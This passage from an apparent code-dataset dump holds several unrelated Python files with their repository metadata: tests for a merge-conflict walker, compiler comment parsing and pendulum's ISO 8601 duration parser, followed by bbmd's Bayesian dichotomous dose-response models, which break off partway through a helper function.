"""Tests a walker against a file with invalid conflict section"""
# Given a file to merge
file = CW_PATH.format('invalid_conflict_3')
walker = ConflictsWalker(file, 'test', REPORT_NONE, False)
# When walking the conflicts
with self.assertRaises(RuntimeError):
walker.has_more_conflicts()
walker.end(False)
os.remove(walker.merged)
def test_extract_lines(self):
"""Tests how a conflict extracts lines from blocks"""
# Given a file to merge
local = "\n" # empty
base = "foo\nbar\nbaz\neggs\nbacon\n"
remote = "hello world\n"
conflict = Conflict(local, base, remote, "<<<<<<<\n", ">>>>>>>\n")
# extracting lines
self.assertEqual(conflict.local_lines(), [])
self.assertEqual(conflict.base_lines(), ["foo\n", "bar\n", "baz\n", "eggs\n", "bacon\n"])
self.assertEqual(conflict.remote_lines(), ["hello world\n"])
if __name__ == '__main__':
unittest.main()
| 40.942149 | 872 | 0.662798 | 1,202 | 9,908 | 5.292845 | 0.143095 | 0.018076 | 0.046998 | 0.079535 | 0.874096 | 0.871424 | 0.870009 | 0.865608 | 0.858378 | 0.848004 | 0 | 0.00131 | 0.229612 | 9,908 | 241 | 873 | 41.112033 | 0.832176 | 0.162798 | 0 | 0.716312 | 0 | 0.035461 | 0.186631 | 0.03574 | 0.007092 | 0 | 0 | 0 | 0.304965 | 1 | 0.085106 | false | 0 | 0.021277 | 0 | 0.113475 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1db49643573088e944ab3e9708c5f78ae7f1898 | 1,265 | py | Python | test/test_comments.py | ajstrand/rbc | 21b92f2e66c6e00f6b71373b5b3996612c797527 | [
"MIT"
] | 12 | 2016-02-04T12:27:04.000Z | 2021-05-07T01:51:55.000Z | test/test_comments.py | ajstrand/rbc | 21b92f2e66c6e00f6b71373b5b3996612c797527 | [
"MIT"
] | null | null | null | test/test_comments.py | ajstrand/rbc | 21b92f2e66c6e00f6b71373b5b3996612c797527 | [
"MIT"
] | 3 | 2017-11-02T17:13:03.000Z | 2021-12-24T07:22:47.000Z | def test_simple_comment(check_output):
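# Note (added for orientation): these tests exercise /* ... */ handling in
# the compiler -- comments end at the first "*/" terminator and may contain
# extra asterisks or span multiple lines without nesting.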
check_output('''
main() {
extrn putchar;
/* a comment */
putchar('a');
}
''', 'a')
def test_comment_stops_at_first_terminator(check_output):
check_output('''
main() {
extrn putchar;
/* a comment */
putchar('a');
/* another comment */
}
''', 'a')
def test_comment_accepts_initial_asterisk(check_output):
check_output('''
main() {
extrn putchar;
/** a comment */
putchar('a');
}
''', 'a')
def test_comment_accepts_final_asterisk(check_output):
check_output('''
main() {
extrn putchar;
/* a comment **/
putchar('a');
}
''', 'a')
def test_comment_accepts_medial_asterisk(check_output):
check_output('''
main() {
extrn putchar;
/* a * comment */
putchar('a');
}
''', 'a')
def test_comment_accepts_newline(check_output):
check_output('''
main() {
extrn putchar;
/* a
multi
line
comment */
putchar('a');
}
''', 'a')
| 20.403226 | 57 | 0.455336 | 110 | 1,265 | 4.927273 | 0.209091 | 0.243542 | 0.177122 | 0.243542 | 0.804428 | 0.763838 | 0.763838 | 0.763838 | 0.691882 | 0.691882 | 0 | 0 | 0.406324 | 1,265 | 61 | 58 | 20.737705 | 0.721704 | 0 | 0 | 0.615385 | 0 | 0 | 0.608386 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a9e80877a23364e28bb2226afe89aba355ededca | 7,361 | py | Python | tests/parsing/test_parsing_duration.py | shammellee/pendulum | bb179c8fb6ef92b7bfc471a46338abbfac9fafca | [
"MIT"
] | 1 | 2018-11-25T03:10:22.000Z | 2018-11-25T03:10:22.000Z | tests/parsing/test_parsing_duration.py | shammellee/pendulum | bb179c8fb6ef92b7bfc471a46338abbfac9fafca | [
"MIT"
] | null | null | null | tests/parsing/test_parsing_duration.py | shammellee/pendulum | bb179c8fb6ef92b7bfc471a46338abbfac9fafca | [
"MIT"
] | 1 | 2020-07-24T17:37:18.000Z | 2020-07-24T17:37:18.000Z | import pytest
from pendulum.parsing import parse, ParserError
def test_parse_duration():
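# Note (added for orientation): ISO 8601 durations put "P" before the date
# designators (Y, M, W, D) and "T" before the time designators (H, M, S).
# As the cases below show, a fraction (dot or comma) is accepted only on
# the last component, and weeks cannot be combined with other designators.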
text = "P2Y3M4DT5H6M7S"
parsed = parse(text)
assert parsed.years == 2
assert parsed.months == 3
assert parsed.weeks == 0
assert parsed.remaining_days == 4
assert parsed.hours == 5
assert parsed.minutes == 6
assert parsed.remaining_seconds == 7
assert parsed.microseconds == 0
text = "P1Y2M3DT4H5M6.5S"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 4
assert parsed.minutes == 5
assert parsed.remaining_seconds == 6
assert parsed.microseconds == 500000
text = "P1Y2M3DT4H5M6,5S"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 4
assert parsed.minutes == 5
assert parsed.remaining_seconds == 6
assert parsed.microseconds == 500000
text = "P1Y2M3D"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1Y2M3.5D"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1Y2M3,5D"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "PT4H54M6.5S"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 4
assert parsed.minutes == 54
assert parsed.remaining_seconds == 6
assert parsed.microseconds == 500000
text = "PT4H54M6,5S"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 4
assert parsed.minutes == 54
assert parsed.remaining_seconds == 6
assert parsed.microseconds == 500000
text = "P1Y"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1.5Y"
with pytest.raises(ParserError):
parse(text)
text = "P1,5Y"
with pytest.raises(ParserError):
parse(text)
text = "P1M"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 1
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1.5M"
with pytest.raises(ParserError):
parse(text)
text = "P1,5M"
with pytest.raises(ParserError):
parse(text)
text = "P1W"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 1
assert parsed.remaining_days == 0
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1.5W"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 1
assert parsed.remaining_days == 3
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1,5W"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 1
assert parsed.remaining_days == 3
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1D"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 1
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1.5D"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 1
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1,5D"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 1
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "PT1H"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 1
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "PT1.5H"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 1
assert parsed.minutes == 30
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "PT1,5H"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 1
assert parsed.minutes == 30
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
def test_parse_duration_no_operator():
with pytest.raises(ParserError):
parse("2Y3M4DT5H6M7S")
def test_parse_duration_weeks_combined():
with pytest.raises(ParserError):
parse("P1Y2W")
def test_parse_duration_invalid_order():
with pytest.raises(ParserError):
parse("P1S")
with pytest.raises(ParserError):
parse("P1D1S")
with pytest.raises(ParserError):
parse("1Y2M3D1SPT1M")
with pytest.raises(ParserError):
parse("P1Y2M3D2MT1S")
with pytest.raises(ParserError):
parse("P2M3D1ST1Y1M")
with pytest.raises(ParserError):
parse("P1Y2M2MT3D1S")
with pytest.raises(ParserError):
parse("P1D1Y1M")
with pytest.raises(ParserError):
parse("PT1S1H")
def test_parse_duration_invalid():
with pytest.raises(ParserError):
parse("P1Dasdfasdf")
def test_parse_duration_fraction_only_allowed_on_last_component():
with pytest.raises(ParserError):
parse("P2Y3M4DT5.5H6M7S")
| 24.868243 | 66 | 0.650999 | 907 | 7,361 | 5.213892 | 0.085998 | 0.385705 | 0.217171 | 0.13026 | 0.90738 | 0.809473 | 0.802707 | 0.802707 | 0.793614 | 0.793614 | 0 | 0.052793 | 0.248608 | 7,361 | 295 | 67 | 24.952542 | 0.802206 | 0 | 0 | 0.786325 | 0 | 0 | 0.037359 | 0 | 0 | 0 | 0 | 0 | 0.649573 | 1 | 0.025641 | false | 0 | 0.008547 | 0 | 0.034188 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e71c2e597e3fa2fbf3b733b90b280e2d9d4b2267 | 31,331 | py | Python | bbmd/models/dichotomous.py | uashogeschoolutrecht/bbmd | 40a5beb0554df00b512e672bf5be8297d0523b9b | [
"Apache-2.0"
] | null | null | null | bbmd/models/dichotomous.py | uashogeschoolutrecht/bbmd | 40a5beb0554df00b512e672bf5be8297d0523b9b | [
"Apache-2.0"
] | null | null | null | bbmd/models/dichotomous.py | uashogeschoolutrecht/bbmd | 40a5beb0554df00b512e672bf5be8297d0523b9b | [
"Apache-2.0"
] | null | null | null | import numpy as np
import logging
from scipy import stats
from . import base
class Dichotomous(base.DoseResponseModel):
def extra_risk(self, bmr):
raise NotImplementedError('Abstract method')
def added_risk(self, bmr):
raise NotImplementedError('Abstract method')
def get_input_count(self):
return self.data['len']
def likelihood(self, ps, ys, ns):
ys2 = ys.copy()
ys2[ys2 == 0] = self.ZEROISH
ys2[ys2 == 1] = 1. - self.ZEROISH
return np.sum(ys2 * np.log(ps) + (ns - ys2) * np.log(1. - ps))
def get_plot_bounds(self, xs, vectors):
for i in range(xs.size):
resps = self.get_response_values(xs[i], **self.parameters)
vectors[i, :] = (
xs[i],
np.percentile(resps, 5.),
np.percentile(resps, 50.),
np.percentile(resps, 95.),
)
return vectors
def get_predicted_response_vector(self):
raise NotImplementedError('Abstract method')
def get_trend_test(self):
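# This appears to implement a one-sided Cochran-Armitage-style trend test
# across dose groups; the z statistic and its normal-tail p-value are
# cached on the instance after the first call.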
if not hasattr(self, '_trend_z'):
ns = self.data['n']
cases = self.data['y']
doses = self.data['dnorm']
ns_sum = ns.sum()
cases_sum = cases.sum()
expect_case = ns * cases_sum / ns_sum
prod_nd = doses * ns
prod_nd2 = (doses ** 2) * ns
test_v = (ns_sum-cases_sum) * cases_sum * \
(ns_sum * prod_nd2.sum() - prod_nd.sum() ** 2) / \
(ns_sum ** 3)
prod_d_diffoe = (cases - expect_case) * doses
test_z = prod_d_diffoe.sum() / test_v ** 0.5
self._trend_z = test_z
self._trend_p_value = 1 - stats.norm.cdf(test_z)
return [self._trend_z, self._trend_p_value]
def get_stan_model(self):
return self.STAN_MODEL
class Logistic(Dichotomous):
PARAMETERS = ('a', 'b')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real p_a[2]; // prior for a
real p_b[2]; // prior for b
}
parameters {
real a;
real<lower=0> b;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],1/(1+exp(-a-b*dnorm[i])));
}
"""
LATEX_EQUATION = r'$f(dose) = \frac{1}{1+e^{-a-b \times dose}}$' # noqa
def get_priors(self):
return {
'p_a': [-50, 50],
'p_b': [0, 100],
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = (1. / (1. + np.exp(-a[i] - b[i] * doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = (1. / (1. + np.exp(-a[i] - b[i] * doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return 1. / (1. + np.exp(-kw['a'] - kw['b'] * x))
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return np.log((1-bmr)/(1+bmr*np.exp(-a)))/(-b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return np.log((1-bmr-bmr/np.exp(-a))/(1+bmr+bmr*np.exp(-a)))/(-b)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
return (1. / (1. + np.exp(-a - b * dose)))
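# Illustrative numpy check (added; not part of the original module): the
# closed-form `extra_risk` inversion for the logistic model should map the
# benchmark response back onto the response curve. Values are arbitrary.
def _check_logistic_extra_risk(a=-2.0, b=1.5, bmr=0.1):
    p0 = 1.0 / (1.0 + np.exp(-a))
    bmd = np.log((1.0 - bmr) / (1.0 + bmr * np.exp(-a))) / (-b)
    p_bmd = 1.0 / (1.0 + np.exp(-a - b * bmd))
    assert abs((p_bmd - p0) / (1.0 - p0) - bmr) < 1e-12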
class LogLogistic(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dno0norm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0, upper=1> a;
real <lower=pwr_lbound> b;
real c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],a+(1-a)/(1+exp(-c-b*log(dno0norm[i]))));
}
"""
LATEX_EQUATION = r'$f(dose) = a+\frac{(1-a)}{1+e^{-c-b \times \log(dose)}}$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [-5, 15],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dno0norm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i]+(1-a[i])/(1+np.exp(-c[i]-b[i]*np.log(doses))))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
# TODO: refactor to not duplicate get_predicted_response_vector
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dno0norm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i]+(1-a[i])/(1+np.exp(-c[i]-b[i]*np.log(doses))))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
if x == 0:
x = self.ZEROISH
return kw['a'] + (1 - kw['a']) / (1 + np.exp(-kw['c'] - kw['b'] * np.log(x)))
def extra_risk(self, bmr):
b = self.parameters['b']
c = self.parameters['c']
return np.exp((np.log(bmr / (1. - bmr)) - c) / b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.exp((np.log(bmr / (1. - a - bmr)) - c) / b)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return (a + (1 - a) / (1 + np.exp(-c - b * np.log(dose))))
class LogProbit(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dno0norm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0, upper=1> a;
real <lower=pwr_lbound> b;
real c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i], a + (1-a) * normal_cdf(c + b * log(dno0norm[i]), 0, 1));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times \Phi(c+b \times \log(dose))$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [-5, 15],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dno0norm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i]+(1.-a[i])*stats.norm.cdf(c[i]+b[i]*np.log(doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
# TODO: refactor to not duplicate get_predicted_response_vector
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dno0norm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i]+(1.-a[i])*stats.norm.cdf(c[i]+b[i]*np.log(doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
if x == 0:
x = self.ZEROISH
return kw['a'] + (1 - kw['a']) * stats.norm.cdf(kw['c'] + kw['b'] * np.log(x))
def extra_risk(self, bmr):
b = self.parameters['b']
c = self.parameters['c']
return np.exp((stats.norm.ppf(bmr) - c) / b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.exp((stats.norm.ppf(bmr / (1. - a)) - c) / b)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return (a + (1.-a) * stats.norm.cdf(c + b * np.log(dose)))
class Probit(Dichotomous):
PARAMETERS = ('a', 'b')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real p_a[2]; // prior for a
real p_b[2]; // prior for b
}
parameters {
real a;
real<lower=0> b;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],normal_cdf(a+b*dnorm[i],0,1));
}
"""
LATEX_EQUATION = r'$f(dose) = \Phi(a+b \times dose)$' # noqa
def get_priors(self):
return {
'p_a': [-50, 50],
'p_b': [0, 100],
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = stats.norm.cdf(a[i] + b[i] * doses)
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = stats.norm.cdf(a[i] + b[i] * doses)
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return stats.norm.cdf(kw['a'] + kw['b'] * x)
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return (stats.norm.ppf((bmr + (1 - bmr) * stats.norm.cdf(a))) - a) / b
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return (stats.norm.ppf(bmr + stats.norm.cdf(a)) - a) / b
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
return stats.norm.cdf(a + b * dose)
class QuantalLinear(Dichotomous):
PARAMETERS = ('a', 'b')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real p_a[2]; // prior for a
real p_b[2]; // prior for b
}
parameters {
real <lower=0, upper=1> a;
real <lower=0> b;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],a+(1-a)*(1-exp(-b*dnorm[i])));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times (1 - e^{-b \times dose})$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 100],
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i] + (1 - a[i]) * (1 - np.exp(-b[i] * doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i] + (1 - a[i]) * (1 - np.exp(-b[i] * doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return kw['a'] + (1 - kw['a'])*(1 - np.exp(- kw['b'] * x))
def extra_risk(self, bmr):
b = self.parameters['b']
return np.log(1-bmr)/(-b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return np.log(1-bmr/(1-a))/(-b)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
return a+(1-a)*(1-np.exp(-b*dose))
class Multistage2(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0, upper=1> a;
real <lower=0> b;
real <lower=0> c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],a+(1-a)*(1-exp(-b*dnorm[i]-c*(dnorm[i]^2))));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times (1 - e^{-b \times dose -c \times dose^{2}})$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 100],
'p_c': [0, 100],
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i]+(1-a[i])*(1-np.exp(-b[i]*doses-c[i]*doses**2)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i]+(1-a[i])*(1-np.exp(-b[i]*doses-c[i]*doses**2)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return kw['a'] + (1 - kw['a'])*(1 - np.exp(- kw['b'] * x - kw['c'] * x**2))
def extra_risk(self, bmr):
b = self.parameters['b']
c = self.parameters['c']
return (-b+np.sqrt(b**2-4*c*np.log(1-bmr)))/(2*c)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return (-b+np.sqrt(b**2-4*c*np.log(1-bmr/(1-a))))/(2*c)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return a+(1-a)*(1-np.exp(-b*dose-c*dose**2))
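# Illustrative check (added; not part of the original module): `extra_risk`
# takes the positive root of c*d^2 + b*d + log(1-bmr) = 0, so the extra
# risk at the returned dose should equal bmr. Parameter values are arbitrary.
def _check_multistage2_extra_risk(a=0.05, b=1.0, c=0.5, bmr=0.1):
    bmd = (-b + np.sqrt(b ** 2 - 4.0 * c * np.log(1.0 - bmr))) / (2.0 * c)
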